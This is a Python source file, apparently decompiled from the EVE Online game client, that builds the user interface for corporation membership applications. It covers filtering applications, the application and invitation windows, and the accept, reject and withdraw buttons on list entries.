e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\ui\\shared\\neocom\\corporation\\corp_ui_applications.py\nfrom math import pi\nfrom carbonui.primitives.container import Container\nfrom eve.client.script.ui.control import entries as listentry\nfrom carbonui.control.scrollentries import SE_BaseClassCore\nfrom eve.client.script.ui.control.buttons import Button\nfrom eve.client.script.ui.control.eveLabel import EveLabelMedium\nfrom eve.client.script.ui.control.infoIcon import MoreInfoIcon\nimport uicls\nimport carbonui.const as uiconst\nimport uiprimitives\nimport uicontrols\nimport uiutil\nimport localization\nimport base\nimport eve.common.lib.appConst as const\nAPPLICATION_STATUS_LABELNAMES = {const.crpApplicationAppliedByCharacter: 'UI/Corporations/CorpApplications/ApplicationUnprocessed',\n const.crpApplicationAcceptedByCorporation: 'UI/Corporations/CorpApplications/ApplicationStatusInvited',\n const.crpApplicationRejectedByCorporation: 'UI/Corporations/CorpApplications/ApplicationStatusRejected',\n const.crpApplicationAcceptedByCharacter: 'UI/Corporations/CorpApplications/ApplicationStatusAccepted',\n const.crpApplicationRejectedByCharacter: 'UI/Corporations/CorpApplications/ApplicationStatusInvitationRejected',\n const.crpApplicationWithdrawnByCharacter: 'UI/Corporations/CorpApplications/ApplicationStatusWithdrawn',\n const.crpApplicationInvitedByCorporation: 'UI/Corporations/CorpApplications/ApplicationStatusDirectlyInvited'\n }\nSTATUS_SETTING_NAME = 'applicationStatus_%d'\n\nclass ApplicationsWindow(uiprimitives.Container):\n __guid__ = 'uicls.ApplicationsTab'\n __nonpersistvars__ = []\n\n def ApplyAttributes(self, attributes):\n uiprimitives.Container.ApplyAttributes(self, attributes)\n self.ownerID = attributes.ownerID\n if self.ownerID == session.charid:\n self.myView = True\n else:\n self.myView = False\n self.quickFilterSetting = 'applicationsQuickFilter_OwnerID%s' % self.ownerID\n self.filteringBy = settings.char.ui.Get(self.quickFilterSetting, '')\n self.showingOld = settings.char.ui.Get('applicationsShowOld_%s' % self.ownerID, False)\n self.InitViewingStatus()\n self.topContainer = uiprimitives.Container(parent=self, name='topContainer', align=uiconst.TOTOP, height=20, padding=const.defaultPadding)\n self.quickFilter = uicls.QuickFilterEdit(parent=self.topContainer, align=uiconst.CENTERRIGHT, setvalue=self.filteringBy)\n self.quickFilter.ReloadFunction = self.OnSearchFieldChanged\n self.quickFilter.OnReturn = self.SearchByCharacterName\n self.statusFilter = uicls.UtilMenu(parent=self.topContainer, align=uiconst.CENTERRIGHT, padding=(1,\n 1,\n 1,\n 1), left=103, GetUtilMenu=self.StatusFilterMenu, texturePath='res:/ui/texture/icons/38_16_205.png', hint=localization.GetByLabel('UI/Corporations/CorpApplications/FilterByStatus'))\n self.inviteButton = Button(name='inviteButton', align=uiconst.CENTERLEFT, parent=self.topContainer, label=localization.GetByLabel('UI/Corporations/CorpApplications/InviteToCorp'), func=self.OpenInviteWindow)\n if not const.corpRolePersonnelManager & session.corprole == const.corpRolePersonnelManager:\n self.inviteButton.display = False\n if self.myView:\n self.topContainer.display = False\n self.applicationContainer = uiprimitives.Container(name='applications', parent=self, align=uiconst.TOALL, padding=const.defaultPadding)\n self.applicationScroll = uicontrols.BasicDynamicScroll(name='applicationsScroll', parent=self.applicationContainer, align=uiconst.TOALL, 
noContentHint=localization.GetByLabel('UI/Corporations/CorpApplications/NoApplicationsFound'))\n self.applicationScroll.multiSelect = 0\n\n def OpenInviteWindow(self, *args):\n InviteToCorpWnd.CloseIfOpen('InviteToCorpWnd')\n InviteToCorpWnd.Open()\n\n def GetApplications(self, statusList=None):\n if statusList is None:\n statusList = self.sr.viewingStatus\n filteredApplications = []\n if self.ownerID == session.corpid:\n if const.corpRolePersonnelManager & session.corprole != const.corpRolePersonnelManager:\n return []\n if self.showingOld:\n applications = sm.GetService('corp').GetOldApplicationsWithStatus(statusList)\n else:\n applications = sm.GetService('corp').GetApplicationsWithStatus(statusList)\n if len(self.filteringBy):\n ownersToPrime = set()\n for application in applications:\n ownersToPrime.add(application.characterID)\n\n if len(ownersToPrime) > 0:\n cfg.eveowners.Prime(ownersToPrime)\n for application in applications:\n if cfg.eveowners.Get(application.characterID).name.lower().find(self.filteringBy.lower()) > -1:\n filteredApplications.append(application)\n\n else:\n filteredApplications = applications\n elif self.showingOld:\n filteredApplications = sm.GetService('corp').GetMyOldApplicationsWithStatus(None)\n else:\n filteredApplications = sm.GetService('corp').GetMyApplicationsWithStatus(None)\n return filteredApplications\n\n def GetCorpApplicationEntries(self, applications):\n ownersToPrime = set()\n scrolllist = []\n if self.myView:\n ownerKey = 'corporationID'\n else:\n ownerKey = 'characterID'\n validApplications = set()\n for application in applications:\n ownerID = getattr(application, ownerKey, None)\n if ownerID is None:\n continue\n ownersToPrime.add(ownerID)\n validApplications.add(application)\n\n if len(ownersToPrime):\n cfg.eveowners.Prime(ownersToPrime)\n expandedApp = settings.char.ui.Get('corporation_applications_expanded', {})\n for application in validApplications:\n data = {'myView': self.myView,'application': application,'sort_%s' % localization.GetByLabel('UI/Common/Date'): application.applicationDateTime,'charID': application.characterID,'isExpanded': expandedApp.get(self.myView, None) == application.applicationID}\n entry = listentry.Get('CorpApplicationEntry', data)\n scrolllist.append(entry)\n\n return scrolllist\n\n def OnSearchFieldChanged(self):\n myFilter = self.quickFilter.GetValue().strip()\n if myFilter == '':\n self.filteringBy = myFilter\n settings.char.ui.Set(self.quickFilterSetting, self.filteringBy)\n applications = self.GetApplications()\n scrolllist = self.GetCorpApplicationEntries(applications)\n self.RefreshApplicationScroll(addNodes=scrolllist, forceClear=True)\n\n def SearchByCharacterName(self, *args):\n myFilter = self.quickFilter.GetValue().strip()\n if len(myFilter) == 0:\n return\n self.filteringBy = myFilter\n applications = self.GetApplications()\n scrolllist = self.GetCorpApplicationEntries(applications)\n self.RefreshApplicationScroll(addNodes=scrolllist, forceClear=True)\n\n def StatusFilterMenu(self, menuParent):\n for applicationStatusID in APPLICATION_STATUS_LABELNAMES:\n if applicationStatusID == const.crpApplicationRejectedByCharacter:\n continue\n isChecked = _LoadApplicationFilterSetting(applicationStatusID, False)\n menuParent.AddCheckBox(_GetApplicationStatusLabel(applicationStatusID), checked=isChecked, callback=(self.ToggleStatusFilter, applicationStatusID, isChecked))\n\n menuParent.AddDivider()\n menuParent.AddCheckBox(localization.GetByLabel('UI/Corporations/CorpApplications/ShowOldApplications'), 
checked=self.showingOld, callback=(self.SetShowOld, not self.showingOld))\n\n def SetShowOld(self, value):\n settings.char.ui.Set('applicationsShowOld_%s' % self.ownerID, value)\n self.showingOld = value\n applications = self.GetApplications()\n scrolllist = self.GetCorpApplicationEntries(applications)\n self.RefreshApplicationScroll(addNodes=scrolllist, forceClear=True)\n\n def ToggleStatusFilter(self, applicationStatusID, isChecked):\n viewingStatus = []\n if isChecked:\n removeNodes = []\n _SaveApplicationFilterSetting(applicationStatusID, False)\n for status in self.sr.viewingStatus:\n if status != applicationStatusID:\n viewingStatus.append(status)\n\n for applicationNode in self.applicationScroll.GetNodes():\n if applicationNode.application.status not in viewingStatus:\n removeNodes.append(applicationNode)\n\n self.RefreshApplicationScroll(removeNodes=removeNodes)\n else:\n _SaveApplicationFilterSetting(applicationStatusID, True)\n viewingStatus.append(applicationStatusID)\n viewingStatus.extend(self.sr.viewingStatus)\n applications = self.GetApplications([applicationStatusID])\n scrolllist = self.GetCorpApplicationEntries(applications)\n if len(scrolllist) > 0:\n self.RefreshApplicationScroll(addNodes=scrolllist)\n self.sr.viewingStatus = viewingStatus\n\n def InitViewingStatus(self):\n viewingStatus = []\n for applicationStatusID in APPLICATION_STATUS_LABELNAMES:\n if self.ownerID == session.charid:\n viewingStatus.append(applicationStatusID)\n elif _LoadApplicationFilterSetting(applicationStatusID, False):\n viewingStatus.append(applicationStatusID)\n\n if len(viewingStatus) == 0:\n viewingStatus = [const.crpApplicationAppliedByCharacter]\n _SaveApplicationFilterSetting(const.crpApplicationAppliedByCharacter, True)\n self.sr.viewingStatus = viewingStatus\n\n def LoadApplications(self):\n if self.destroyed:\n return\n try:\n try:\n myFilter = self.quickFilter.GetValue()\n if len(myFilter):\n self.filteringBy = myFilter\n sm.GetService('corpui').ShowLoad()\n applications = self.GetApplications()\n scrolllist = self.GetCorpApplicationEntries(applications)\n if len(scrolllist) > 0:\n self.HideNoContentHint()\n self.RefreshApplicationScroll(addNodes=scrolllist)\n else:\n self.ShowNoContentHint()\n except:\n pass\n\n finally:\n sm.GetService('corpui').HideLoad()\n\n def RefreshApplicationScroll(self, addNodes=[], removeNodes=[], reloadNodes=[], forceClear=False):\n if forceClear:\n self.applicationScroll.Clear()\n elif len(removeNodes):\n self.applicationScroll.RemoveNodes(removeNodes, updateScroll=True)\n if len(reloadNodes):\n self.applicationScroll.ReloadNodes(reloadNodes)\n if len(addNodes):\n self.applicationScroll.AddNodes(0, addNodes, updateScroll=True)\n toSort = self.applicationScroll.GetNodes()\n if toSort:\n self.HideNoContentHint()\n sortedNodes = sorted(toSort, key=lambda x: x.application.applicationDateTime, reverse=True)\n self.applicationScroll.SetOrderedNodes(sortedNodes)\n else:\n self.ShowNoContentHint()\n\n def ShowNoContentHint(self):\n self.applicationScroll.ShowHint(localization.GetByLabel('UI/Corporations/CorpApplications/NoApplicationsFound'))\n\n def HideNoContentHint(self):\n self.applicationScroll.ShowHint('')\n\n def OnCorporationApplicationChanged(self, corpID, applicantID, applicationID, newApplication):\n if self.destroyed:\n return\n for applicationNode in self.applicationScroll.GetNodes():\n if applicationNode.application.applicationID == applicationID:\n applicationNode.application = newApplication\n if newApplication.status in self.sr.viewingStatus:\n 
self.RefreshApplicationScroll(reloadNodes=[applicationNode])\n                else:\n                    self.RefreshApplicationScroll(removeNodes=[applicationNode])\n                break\n        else:\n            if newApplication.status in self.sr.viewingStatus:\n                scrolllist = self.GetCorpApplicationEntries([newApplication])\n                self.RefreshApplicationScroll(addNodes=scrolllist)\n\n\nclass ViewCorpApplicationWnd(uicontrols.Window):\n    __guid__ = 'form.ViewCorpApplicationWnd'\n    default_width = 400\n    default_height = 255\n    default_minSize = (default_width, default_height)\n\n    def ApplyAttributes(self, attributes):\n        uicontrols.Window.ApplyAttributes(self, attributes)\n        self.DefineButtons(uiconst.OKCANCEL, okFunc=self.Confirm, cancelFunc=self.Cancel)\n        self.charID = attributes.get('characterID')\n        self.appText = attributes.get('applicationText')\n        self.status = attributes.get('status')\n        wndCaption = localization.GetByLabel('UI/Corporations/CorpApplications/ViewApplicationDetailCaption')\n        self.SetCaption(wndCaption)\n        self.SetTopparentHeight(0)\n        self.MakeUnResizeable()\n        self.ConstructLayout()\n\n    def ConstructLayout(self):\n        charInfoCont = uiprimitives.Container(name='charInfo', parent=self.sr.main, align=uiconst.TOTOP, height=68, padding=const.defaultPadding)\n        charLogoCont = uiprimitives.Container(name='charLogo', parent=charInfoCont, align=uiconst.TOLEFT, width=68)\n        charTextCont = uiprimitives.Container(name='charName', parent=charInfoCont, align=uiconst.TOALL)\n        applicationCont = uiprimitives.Container(name='charInfo', parent=self.sr.main, align=uiconst.TOALL, padding=(const.defaultPadding, 0, const.defaultPadding, const.defaultPadding))\n        uiutil.GetOwnerLogo(charLogoCont, self.charID, size=64, noServerCall=True)\n        charText = localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationSubjectLine', player=self.charID)\n        charNameLabel = uicontrols.EveLabelLarge(parent=charTextCont, text=charText, top=12, align=uiconst.TOPLEFT, width=270)\n        editText = localization.GetByLabel('UI/Corporations/BaseCorporationUI/CorporationApplicationText')\n        editLabel = uicontrols.EveLabelSmall(parent=applicationCont, text=editText, align=uiconst.TOTOP)\n        self.rejectRb = uicontrols.Checkbox(text=localization.GetByLabel('UI/Corporations/CorpApplications/RejectApplication'), parent=applicationCont, configName='reject', retval=1, checked=False, groupname='state', align=uiconst.TOBOTTOM)\n        self.acceptRb = uicontrols.Checkbox(text=localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationInviteApplicant'), parent=applicationCont, configName='accept', retval=0, checked=True, groupname='state', align=uiconst.TOBOTTOM)\n        if self.status not in const.crpApplicationActiveStatuses:\n            self.rejectRb.state = uiconst.UI_HIDDEN\n            self.acceptRb.state = uiconst.UI_HIDDEN\n        self.applicationText = uicls.EditPlainText(setvalue=self.appText, parent=applicationCont, maxLength=1000, readonly=True)\n\n    def Confirm(self, *args):\n        if self.status not in const.crpApplicationActiveStatuses:\n            self.Cancel()\n            return\n        applicationText = self.applicationText.GetValue()\n        if len(applicationText) > 1000:\n            error = localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationTextTooLong', length=len(applicationText))\n            eve.Message('CustomInfo', {'info': error})\n        else:\n            if self.rejectRb.checked:\n                rejected = const.crpApplicationRejectedByCorporation\n            else:\n                rejected = const.crpApplicationAcceptedByCorporation\n            self.result = rejected\n            self.SetModalResult(1)\n\n    def Cancel(self, *args):\n        self.result = None\n        self.SetModalResult(0)\n        return\n\n\nclass 
MyCorpApplicationWnd(uicontrols.Window):\n __guid__ = 'form.MyCorpApplicationWnd'\n default_width = 400\n default_height = 300\n default_minSize = (default_width, default_height)\n\n def ApplyAttributes(self, attributes):\n uicontrols.Window.ApplyAttributes(self, attributes)\n self.corpid = attributes.get('corpid')\n self.application = attributes.get('application')\n self.status = attributes.get('status')\n self.windowID = 'viewApplicationWindow'\n if self.status in const.crpApplicationActiveStatuses:\n self.DefineButtons(uiconst.OKCANCEL, okFunc=self.Confirm, cancelFunc=self.Cancel)\n else:\n self.DefineButtons(uiconst.OK, okFunc=self.Cancel)\n wndCaption = localization.GetByLabel('UI/Corporations/CorpApplications/ViewApplicationDetailCaption')\n self.SetCaption(wndCaption)\n self.SetTopparentHeight(0)\n self.MakeUnResizeable()\n self.ConstructLayout()\n\n def ConstructLayout(self):\n self.acceptRb = None\n self.withdrawRb = None\n corpName = cfg.eveowners.Get(self.corpid).name\n corpInfoCont = uiprimitives.Container(name='corpInfo', parent=self.sr.main, align=uiconst.TOTOP, height=68, padding=const.defaultPadding)\n corpLogoCont = uiprimitives.Container(name='corpLogo', parent=corpInfoCont, align=uiconst.TOLEFT, width=68)\n corpTextCont = uiprimitives.Container(name='corpName', parent=corpInfoCont, align=uiconst.TOALL)\n controlCont = uiprimitives.Container(name='buttons', parent=self.sr.main, align=uiconst.TOBOTTOM, padding=(const.defaultPadding, 0, const.defaultPadding, const.defaultPadding))\n controlContHeight = 0\n applicationCont = uiprimitives.Container(name='applicationCont', parent=self.sr.main, align=uiconst.TOALL, padding=(const.defaultPadding, 0, const.defaultPadding, const.defaultPadding))\n uiutil.GetOwnerLogo(corpLogoCont, self.corpid, size=64, noServerCall=True)\n corpText = localization.GetByLabel('UI/Corporations/CorpApplications/YourApplicationToJoin', corpName=corpName)\n corpNameLabel = uicontrols.EveLabelLarge(parent=corpTextCont, text=corpText, top=12, align=uiconst.TOPLEFT, width=270)\n if self.status == const.crpApplicationAppliedByCharacter:\n statusText = localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationNotProcessed')\n statusLabel = uicontrols.EveLabelSmall(parent=applicationCont, text=statusText, align=uiconst.TOTOP, padBottom=const.defaultPadding)\n else:\n statusText = statusLabel = ''\n editText = localization.GetByLabel('UI/Corporations/BaseCorporationUI/CorporationApplicationText')\n editLabel = uicontrols.EveLabelSmall(parent=applicationCont, text=editText, align=uiconst.TOTOP)\n if self.application.applicationText is not None:\n appText = self.application.applicationText\n else:\n appText = ''\n self.applicationText = uicls.EditPlainText(setvalue=appText, parent=applicationCont, maxLength=1000, readonly=True)\n if self.status in const.crpApplicationActiveStatuses:\n isWithdrawChecked = True\n if self.status in (const.crpApplicationAcceptedByCorporation, const.crpApplicationInvitedByCorporation):\n isWithdrawChecked = False\n self.acceptRb = uicontrols.Checkbox(text=localization.GetByLabel('UI/Corporations/CorpApplications/AcceptApplication'), parent=controlCont, configName='accept', retval=1, checked=True, groupname='stateGroup', align=uiconst.TOBOTTOM)\n controlContHeight += 40\n self.withdrawRb = uicontrols.Checkbox(text=localization.GetByLabel('UI/Corporations/CorpApplications/WithdrawApplication'), parent=controlCont, configName='accept', retval=3, checked=isWithdrawChecked, groupname='stateGroup', align=uiconst.TOBOTTOM)\n 
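# reserve extra height in the bottom control container for the withdraw option\n            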
controlContHeight += 20\n controlCont.height = controlContHeight\n return\n\n def Confirm(self, *args):\n self.result = None\n if self.withdrawRb.checked:\n self.result = const.crpApplicationWithdrawnByCharacter\n elif self.acceptRb.checked:\n self.result = const.crpApplicationAcceptedByCharacter\n self.SetModalResult(1)\n return\n\n def Cancel(self, *args):\n self.result = None\n self.SetModalResult(0)\n return\n\n def WithdrawApplication(self, *args):\n try:\n sm.GetService('corpui').ShowLoad()\n application = self.application\n sm.GetService('corpui').ShowLoad()\n sm.GetService('corp').UpdateApplicationOffer(application.applicationID, application.characterID, application.corporationID, application.applicationText, const.crpApplicationWithdrawnByCharacter)\n finally:\n sm.GetService('corpui').HideLoad()\n uicontrols.Window.CloseIfOpen(windowID='viewApplicationWindow')\n\n\nclass ApplyToCorpWnd(uicontrols.Window):\n __guid__ = 'form.ApplyToCorpWnd'\n default_width = 400\n default_height = 245\n default_minSize = (default_width, default_height)\n\n def ApplyAttributes(self, attributes):\n uicontrols.Window.ApplyAttributes(self, attributes)\n self.DefineButtons(uiconst.OKCANCEL, okFunc=self.Confirm, cancelFunc=self.Cancel)\n self.corpid = attributes.get('corpid')\n self.corporation = attributes.get('corporation')\n wndCaption = localization.GetByLabel('UI/Corporations/BaseCorporationUI/JoinCorporation')\n self.SetCaption(wndCaption)\n self.SetTopparentHeight(0)\n self.MakeUnResizeable()\n self.ConstructLayout()\n\n def ConstructLayout(self):\n corpName = cfg.eveowners.Get(self.corpid).name\n corpInfoCont = uiprimitives.Container(name='corpInfo', parent=self.sr.main, align=uiconst.TOTOP, height=68, padding=const.defaultPadding)\n corpLogoCont = uiprimitives.Container(name='corpLogo', parent=corpInfoCont, align=uiconst.TOLEFT, width=68)\n corpTextCont = uiprimitives.Container(name='corpName', parent=corpInfoCont, align=uiconst.TOALL)\n applicationCont = uiprimitives.Container(name='corpInfo', parent=self.sr.main, align=uiconst.TOALL, padding=(const.defaultPadding, 0, const.defaultPadding, const.defaultPadding))\n uiutil.GetOwnerLogo(corpLogoCont, self.corpid, size=64, noServerCall=True)\n corpText = localization.GetByLabel('UI/Corporations/BaseCorporationUI/ApplyForMembership', corporation=corpName)\n corpNameLabel = uicontrols.EveLabelLarge(parent=corpTextCont, text=corpText, top=12, align=uiconst.TOPLEFT, width=270)\n editText = localization.GetByLabel('UI/Corporations/BaseCorporationUI/CorporationApplicationText')\n editLabel = uicontrols.EveLabelSmall(parent=applicationCont, text=editText, align=uiconst.TOTOP)\n tax = self.corporation.taxRate * 100\n taxText = localization.GetByLabel('UI/Corporations/BaseCorporationUI/CurrentTaxRateForCorporation', corporation=corpName, taxRate=tax)\n taxLabel = uicontrols.EveLabelSmall(parent=applicationCont, text=taxText, align=uiconst.TOBOTTOM)\n corpService = sm.GetService('corp')\n aggressionSettings = corpService.GetAggressionSettings(self.corpid)\n statusText = corpService.GetCorpFriendlyFireStatus(aggressionSettings)\n ffText = localization.GetByLabel('UI/Corporations/FriendlyFire/FriendlyFireStatus', ffStatus=statusText)\n ffCont = uiprimitives.Container(parent=applicationCont, align=uiconst.TOBOTTOM, height=16)\n friendlyFireLabel = uicontrols.EveLabelSmall(parent=ffCont, text=ffText, align=uiconst.TOLEFT)\n helpIcon = MoreInfoIcon(parent=ffCont, align=uiconst.TORIGHT, hint=localization.GetByLabel('UI/Corporations/FriendlyFire/Description'))\n 
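# if the corporation is not flagged as recruiting, warn the applicant and grow the window to fit the extra hint\n        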
if self.corporation and not self.corporation.isRecruiting:\n notRecruitingText = localization.GetByLabel('UI/Corporations/BaseCorporationUI/RecruitmentMayBeClosed')\n notRecruiting = uicontrols.EveLabelSmall(parent=applicationCont, text=notRecruitingText, align=uiconst.TOBOTTOM, idx=0)\n self.SetMinSize((self.default_width, self.default_height + notRecruiting.textheight), refresh=True)\n self.applicationText = uicls.EditPlainText(setvalue='', parent=applicationCont, align=uiconst.TOALL, maxLength=1000)\n\n def Confirm(self, *args):\n applicationText = self.applicationText.GetValue()\n if len(applicationText) > const.crpApplicationMaxSize:\n error = localization.GetByLabel('UI/Corporations/BaseCorporationUI/ApplicationTextTooLong', length=len(applicationText))\n eve.Message('CustomInfo', {'info': error})\n else:\n self.result = applicationText\n self.SetModalResult(1)\n\n def Cancel(self, *args):\n self.result = None\n self.SetModalResult(0)\n return\n\n\ndef get_display_text_for_application(application):\n if application.status == const.crpApplicationRejectedByCorporation:\n display_text = application.responseText or ''\n else:\n display_text = application.applicationText\n return display_text.strip()\n\n\nclass CorpApplicationEntry(SE_BaseClassCore):\n __guid__ = 'listentry.CorpApplicationEntry'\n __notifyevents__ = []\n LOGOPADDING = 70\n TEXTPADDING = 18\n CORPNAMEPAD = (LOGOPADDING, 0, 0, 0)\n EXTENDEDPAD = (\n LOGOPADDING, const.defaultPadding, const.defaultPadding, const.defaultPadding)\n CORPNAMECLASS = uicontrols.EveLabelLarge\n EXTENDEDCLASS = uicontrols.EveLabelMedium\n APPHEADERHEIGHT = 53\n\n def PreLoad(node):\n application = node.application\n\n def Startup(self, *args):\n node = self.sr.node\n self.corpSvc = sm.GetService('corp')\n self.lscSvc = sm.GetService('LSC')\n self.viewButton = None\n self.removeButton = None\n self.rejectButton = None\n self.acceptButton = None\n self.ownerID = None\n if node.myView:\n self.ownerID = node.application.corporationID\n else:\n self.ownerID = node.application.characterID\n self.entryContainer = uiprimitives.Container(parent=self)\n self.headerContainer = uiprimitives.Container(parent=self.entryContainer, align=uiconst.TOTOP, name='applicationHeaderContainer', height=self.APPHEADERHEIGHT)\n self.expander = uiprimitives.Sprite(parent=self.headerContainer, state=uiconst.UI_DISABLED, name='expander', pos=(0,\n 0,\n 16,\n 16), texturePath='res:/UI/Texture/Shared/getMenuIcon.png', align=uiconst.CENTERLEFT)\n if node.isExpanded:\n self.expander.rotation = -pi * 0.5\n logoParent = uiprimitives.Container(parent=self.headerContainer, align=uiconst.TOPLEFT, pos=(16,\n 2,\n 48,\n 48))\n uiutil.GetOwnerLogo(logoParent, self.ownerID, size=48, noServerCall=True)\n logoParent.children[0].OnMouseEnter = self.OnMouseEnter\n logoParent.children[0].OnClick = self.ShowOwnerInfo\n self.nameLabel = self.CORPNAMECLASS(parent=self.headerContainer, name='nameLabel', state=uiconst.UI_DISABLED, align=uiconst.CENTERLEFT, padding=self.CORPNAMEPAD)\n self.expandedParent = uiprimitives.Container(parent=self.entryContainer, name='expandedParent', height=0)\n label_text = get_display_text_for_application(node.application)\n self.expandedLabel = self.EXTENDEDCLASS(parent=self.expandedParent, name='applicationText', text=label_text, padding=self.EXTENDEDPAD, align=uiconst.TOALL)\n self.hilite = uiprimitives.Fill(bgParent=self.headerContainer, color=(1, 1,\n 1,\n 0))\n uiprimitives.Fill(bgParent=self.expandedParent, color=(0, 0, 0, 0.2))\n return\n\n def Load(self, 
node):\n ownerName = cfg.eveowners.Get(self.ownerID).ownerName\n applicationDate = localization.GetByLabel('UI/Corporations/Applications/ApplicationDate', applicationDateTime=node.application.applicationDateTime)\n statusText = '%s' % _GetApplicationStatusLabel(node.application.status)\n nameStatusAndDate = '%s - %s
<br>%s' % (ownerName, statusText, applicationDate)\n        self.nameLabel.text = nameStatusAndDate\n        addPadding = const.defaultPadding\n        if node.myView:\n            if node.application.status not in const.crpApplicationEndStatuses:\n                if self.removeButton is not None and not self.removeButton.destroyed:\n                    self.removeButton.left = addPadding\n                else:\n                    if node.application.status == const.crpApplicationInvitedByCorporation:\n                        label = localization.GetByLabel('UI/Corporations/CorpApplications/DeclineInvitation')\n                        rejectFunc = self.RejectCorpInvitation\n                    else:\n                        label = localization.GetByLabel('UI/Corporations/CorpApplications/WithdrawApplication')\n                        rejectFunc = self.WithdrawMyApplication\n                    self.removeButton = uicontrols.Button(name='removeButton', parent=self.headerContainer, label=label, align=uiconst.CENTERRIGHT, left=addPadding, func=rejectFunc)\n                addPadding += self.removeButton.width + const.defaultPadding\n            elif self.removeButton is not None:\n                self.removeButton.Close()\n                self.removeButton = None\n            if node.myView and node.application.status in (\n             const.crpApplicationAcceptedByCorporation, const.crpApplicationInvitedByCorporation):\n                if self.acceptButton is not None and not self.acceptButton.destroyed:\n                    self.acceptButton.left = addPadding\n                else:\n                    self.acceptButton = uicontrols.Button(name='acceptButton', parent=self.headerContainer, label=localization.GetByLabel('UI/Corporations/CorpApplications/AcceptApplication'), align=uiconst.CENTERRIGHT, left=addPadding, func=self.AcceptInvitation)\n            elif self.acceptButton is not None:\n                self.acceptButton.Close()\n                self.acceptButton = None\n        else:\n            if node.application.status == const.crpApplicationAppliedByCharacter:\n                if self.acceptButton is not None and not self.acceptButton.destroyed:\n                    self.acceptButton.left = addPadding\n                else:\n                    self.acceptButton = uicontrols.Button(name='acceptButton', parent=self.headerContainer, label=localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationInviteApplicant'), align=uiconst.CENTERRIGHT, left=addPadding, func=self.AcceptCorpApplication)\n                    addPadding += self.acceptButton.width + const.defaultPadding\n            elif self.acceptButton is not None:\n                self.acceptButton.Close()\n                self.acceptButton = None\n            if node.application.status not in const.crpApplicationEndStatuses:\n                if self.rejectButton is not None and not self.rejectButton.destroyed:\n                    self.rejectButton.left = addPadding\n                else:\n                    self.rejectButton = uicontrols.Button(name='rejectButton', parent=self.headerContainer, label=localization.GetByLabel('UI/Corporations/CorpApplications/RejectApplication'), align=uiconst.CENTERRIGHT, left=addPadding, func=self.RejectCorpApplication)\n            elif self.rejectButton is not None:\n                self.rejectButton.Close()\n                self.rejectButton = None\n        if node.fadeSize is not None:\n            toHeight, fromHeight = node.fadeSize\n            self.expandedParent.opacity = 0.0\n            uicore.animations.MorphScalar(self, 'height', startVal=fromHeight, endVal=toHeight, duration=0.3)\n            uicore.animations.FadeIn(self.expandedParent, duration=0.3)\n            node.fadeSize = None\n        if node.isExpanded:\n            self.expandedParent.display = True\n            rotValue = -pi * 0.5\n        else:\n            rotValue = 0.0\n            self.expandedParent.display = False\n        uicore.animations.MorphScalar(self.expander, 'rotation', self.expander.rotation, rotValue, duration=0.15)\n        self.expandedLabel.text = get_display_text_for_application(node.application)\n        return\n\n    def OnClick(self):\n        node = self.sr.node\n        reloadNodes = [node]\n        if node.isExpanded:\n            uicore.animations.Tr2DRotateTo(self.expander, -pi * 0.5, 0.0, duration=0.15)\n            
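# collapsing: clear the expansion flag and persist it per view so the state survives scroll reloads\n            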
node.isExpanded = False\n allNodes = settings.char.ui.Get('corporation_applications_expanded', {})\n allNodes[node.myView] = None\n settings.char.ui.Set('corporation_applications_expanded', allNodes)\n else:\n for otherNode in node.scroll.sr.nodes:\n if otherNode.isExpanded and otherNode != node:\n otherNode.isExpanded = False\n reloadNodes.append(otherNode)\n\n uicore.animations.Tr2DRotateTo(self.expander, 0.0, -pi * 0.5, duration=0.15)\n node.isExpanded = True\n node.fadeSize = (\n CorpApplicationEntry.GetDynamicHeight(node, self.width), self.height)\n allNodes = settings.char.ui.Get('corporation_applications_expanded', {})\n allNodes[node.myView] = node.application.applicationID\n settings.char.ui.Set('corporation_applications_expanded', allNodes)\n self.sr.node.scroll.ReloadNodes(reloadNodes, updateHeight=True)\n return\n\n def GetMenu(self):\n node = self.sr.node\n menu = [(uiutil.MenuLabel('UI/Commands/ShowInfo'), self.ShowOwnerInfo)]\n if node.myView:\n if node.application.status not in const.crpApplicationEndStatuses:\n if node.application.status == const.crpApplicationInvitedByCorporation:\n label = uiutil.MenuLabel('UI/Corporations/CorpApplications/DeclineInvitation')\n else:\n label = uiutil.MenuLabel('UI/Corporations/CorpApplications/WithdrawApplication')\n menu.append((label, self.WithdrawMyApplication))\n if node.application.status in (const.crpApplicationAcceptedByCorporation,\n const.crpApplicationInvitedByCorporation):\n menu.append((uiutil.MenuLabel('UI/Corporations/CorpApplications/AcceptApplication'), self.AcceptInvitation))\n elif const.corpRolePersonnelManager & session.corprole == const.corpRolePersonnelManager:\n if node.application.status == const.crpApplicationAppliedByCharacter:\n menu.append((\n uiutil.MenuLabel('UI/Corporations/CorpApplications/ApplicationInviteApplicant'), self.AcceptCorpApplication))\n if node.application.status not in const.crpApplicationEndStatuses:\n menu.append((uiutil.MenuLabel('UI/Corporations/CorpApplications/RejectApplication'), self.RejectCorpApplication))\n return menu\n\n def GetDynamicHeight(node, width):\n text = get_display_text_for_application(node.application)\n entryClass = CorpApplicationEntry\n if node.isExpanded:\n lp, tp, rp, bp = entryClass.EXTENDEDPAD\n textWidth, textHeight = entryClass.EXTENDEDCLASS.MeasureTextSize(text, width=width - (lp + rp))\n textHeight = textHeight + entryClass.APPHEADERHEIGHT + tp + bp\n return textHeight\n else:\n return entryClass.APPHEADERHEIGHT\n\n def ShowOwnerInfo(self):\n owner = cfg.eveowners.Get(self.ownerID)\n sm.GetService('info').ShowInfo(owner.typeID, owner.ownerID)\n\n def OnMouseEnter(self, *args):\n uicore.animations.FadeIn(self.hilite, 0.05, duration=0.1)\n self.hiliteTimer = base.AutoTimer(1, self._CheckIfStillHilited)\n\n def _CheckIfStillHilited(self):\n if uiutil.IsUnder(uicore.uilib.mouseOver, self) or uicore.uilib.mouseOver is self:\n return\n else:\n uicore.animations.FadeOut(self.hilite, duration=0.3)\n self.hiliteTimer = None\n return\n\n def _UpdateCurrentApplicationWithStatus(self, newStatus):\n try:\n sm.GetService('corpui').ShowLoad()\n application = self.sr.node.application\n sm.GetService('corp').UpdateApplicationOffer(application.applicationID, application.characterID, application.corporationID, application.applicationText, newStatus)\n finally:\n sm.GetService('corpui').HideLoad()\n 